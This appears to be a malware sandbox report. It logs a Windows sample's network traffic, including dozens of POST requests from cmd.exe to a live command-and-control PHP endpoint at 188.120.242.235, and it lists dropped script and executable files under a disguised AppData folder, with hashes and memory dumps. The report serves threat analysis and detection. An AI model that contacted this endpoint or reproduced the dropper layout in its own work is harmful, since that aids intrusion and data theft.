        https://tse1.mm.bing.net/th?id=OADD2.10239381705588_1WA9C34P2B6OXP331&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
        Remote address:
        204.79.197.200:443
        Request
        GET /th?id=OADD2.10239381705588_1WA9C34P2B6OXP331&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
        host: tse1.mm.bing.net
        accept: */*
        accept-encoding: gzip, deflate, br
        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
        Response
        HTTP/2.0 200
        cache-control: public, max-age=2592000
        content-length: 382817
        content-type: image/jpeg
        x-cache: TCP_HIT
        access-control-allow-origin: *
        access-control-allow-headers: *
        access-control-allow-methods: GET, POST, OPTIONS
        timing-allow-origin: *
        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 3E32418D83324DCAA8ACAF291674D70F Ref B: LON04EDGE0720 Ref C: 2024-05-11T08:05:35Z
        date: Sat, 11 May 2024 08:05:35 GMT
      • flag-us
        DNS
        88.156.103.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        88.156.103.20.in-addr.arpa
        IN PTR
        Response
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:06:16 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • 2.17.196.105:443
        https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
        tls, http2
        1.4kB
         6.3kB
         16
        11

        HTTP Request

        GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

        HTTP Response

        200
      • 188.120.242.235:80
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        http
        cmd.exe
        324.6kB
         53.0kB
         486
        329

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
      • 188.120.242.235:80
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        http
        cmd.exe
        1.9kB
         641 B
         7
        7

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200
      • 188.120.242.235:80
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        http
        cmd.exe
        2.6kB
         641 B
         12
        7

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200
      • 204.79.197.200:443
        https://tse1.mm.bing.net/th?id=OADD2.10239381705588_1WA9C34P2B6OXP331&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
        tls, http2
        67.8kB
         1.9MB
         1424
        1417

        HTTP Request

        GET https://tse1.mm.bing.net/th?id=OADD2.10239381702593_1BLW9LYE0FMIB48EX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

        HTTP Request

        GET https://tse1.mm.bing.net/th?id=OADD2.10239381705589_1UZ6HI7DU1RQLXLFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

        HTTP Request

        GET https://tse1.mm.bing.net/th?id=OADD2.10239381702592_1OT5ET7HCG1M9EIRY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

        HTTP Request

        GET https://tse1.mm.bing.net/th?id=OADD2.10239381705588_1WA9C34P2B6OXP331&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

        HTTP Response

        200

        HTTP Response

        200

        HTTP Response

        200

        HTTP Response

        200
      • 204.79.197.200:443
        tse1.mm.bing.net
        tls, http2
        1.4kB
         8.5kB
         18
        14
      • 204.79.197.200:443
        tse1.mm.bing.net
        tls, http2
        1.1kB
         8.0kB
         14
        11
      • 204.79.197.200:443
        tse1.mm.bing.net
        tls, http2
        1.1kB
         8.0kB
         14
        11
      • 188.120.242.235:80
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        http
        cmd.exe
        2.4kB
         601 B
         8
        6

        HTTP Request

        POST http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php

        HTTP Response

        200
      • 188.120.242.235:80
        cmd.exe
        52 B
         1
      • 8.8.8.8:53
        8.8.8.8.in-addr.arpa
        dns
        66 B
         90 B
         1
        1

        DNS Request

        8.8.8.8.in-addr.arpa

      • 8.8.8.8:53
        172.210.232.199.in-addr.arpa
        dns
        74 B
         128 B
         1
        1

        DNS Request

        172.210.232.199.in-addr.arpa

      • 8.8.8.8:53
        241.150.49.20.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        241.150.49.20.in-addr.arpa

      • 8.8.8.8:53
        68.159.190.20.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        68.159.190.20.in-addr.arpa

      • 8.8.8.8:53
        105.196.17.2.in-addr.arpa
        dns
        71 B
         135 B
         1
        1

        DNS Request

        105.196.17.2.in-addr.arpa

      • 8.8.8.8:53
        183.142.211.20.in-addr.arpa
        dns
        73 B
         159 B
         1
        1

        DNS Request

        183.142.211.20.in-addr.arpa

      • 8.8.8.8:53
        235.242.120.188.in-addr.arpa
        dns
        74 B
         110 B
         1
        1

        DNS Request

        235.242.120.188.in-addr.arpa

      • 8.8.8.8:53
        26.165.165.52.in-addr.arpa
        dns
        72 B
         146 B
         1
        1

        DNS Request

        26.165.165.52.in-addr.arpa

      • 8.8.8.8:53
        15.164.165.52.in-addr.arpa
        dns
        72 B
         146 B
         1
        1

        DNS Request

        15.164.165.52.in-addr.arpa

      • 8.8.8.8:53
        24.121.18.2.in-addr.arpa
        dns
        70 B
         133 B
         1
        1

        DNS Request

        24.121.18.2.in-addr.arpa

      • 8.8.8.8:53
        77.190.18.2.in-addr.arpa
        dns
        70 B
         133 B
         1
        1

        DNS Request

        77.190.18.2.in-addr.arpa

      • 8.8.8.8:53
        26.35.223.20.in-addr.arpa
        dns
        71 B
         157 B
         1
        1

        DNS Request

        26.35.223.20.in-addr.arpa

      • 8.8.8.8:53
        tse1.mm.bing.net
        dns
        62 B
         173 B
         1
        1

        DNS Request

        tse1.mm.bing.net

        DNS Response

        204.79.197.200
        13.107.21.200

      • 8.8.8.8:53
        88.156.103.20.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        88.156.103.20.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\MsServerBrokerDhcpSvc\OwAS3ElMz3sl8CiEcBXAKJJu9viU7wMG8nRST90KHZpLy5Zk.vbe
        Filesize

        222B

        MD5

        6a3ee7dcfc0c1f8053c0d24d74dafd90

        SHA1

        3bb9d75f6c6628760941e0b3a54810195cc67485

        SHA256

        c48f0935f2db9a7260830834018fd7afebf39c4e9d7c4cad8aa4676008dd7715

        SHA512

        62b36d115ece66b8aa107c1befe78d1707cb2e80ca03288d9f62c3cbb7925d472cf479a89aec4bb29068c376629f119cfb6fdd2c69ed2e249cc16815fdda5496

        Download Submit

      • C:\Users\Admin\AppData\Roaming\MsServerBrokerDhcpSvc\WebSvc.exe
        Filesize

        5.7MB

        MD5

        f120ba47fc16392df01b1e947c7bd6d9

        SHA1

        4bf7e0d57c6aab657a2f93d7c66670b4d0d0ca21

        SHA256

        afa08d81487ba3c82f2b672aa340d78f7841090804de82846e3c6ec5244f239c

        SHA512

        f7ee529db6aca5525626b74cbe2eacc6871f58e6c41742c4d47cbf61ba6a7dc74d828b3b0f039a234f5560e8f53348104e6f182cf61656775f00d73769a9cdb6

        Download Submit

      • C:\Users\Admin\AppData\Roaming\MsServerBrokerDhcpSvc\seUT6SF2g6LubjHj.bat
        Filesize

        82B

        MD5

        cfb98ea195917bd9644b184e9c25a675

        SHA1

        a29083644d06efd7badb63b4a9f66451b3fa996d

        SHA256

        cdb06f3da2a27af06b3b1376f29899349ddb427d6777e70690c9bc4b9d3f8784

        SHA512

        433e0bbb68d1cbbc7148a77681f255bcb03aae2a41f958f3707e5f7a09878539b5186c8cd008e2c25448e8968f4bfd36eb138fdc8f0b7e56a4ac16e480a83dfc

        Download Submit

      • memory/1164-45-0x000000001CC60000-0x000000001CD2D000-memory.dmp

        Filesize

        820KB

        Download

      • memory/1896-13-0x00007FFB08253000-0x00007FFB08255000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1896-12-0x0000000000EB0000-0x000000000108C000-memory.dmp

        Filesize

        1.9MB

        Download

      • memory/1896-15-0x0000000003150000-0x000000000315E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/1896-17-0x00000000032E0000-0x00000000032FC000-memory.dmp

        Filesize

        112KB

        Download

      • memory/1896-18-0x000000001C910000-0x000000001C960000-memory.dmp

        Filesize

        320KB

        Download

      • memory/1896-20-0x0000000003300000-0x0000000003318000-memory.dmp

        Filesize

        96KB

        Download

      • memory/1896-22-0x00000000031A0000-0x00000000031AC000-memory.dmp

        Filesize

        48KB

        Download

      • memory/1896-38-0x000000001CFA0000-0x000000001D06D000-memory.dmp

        Filesize

        820KB

        Download

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.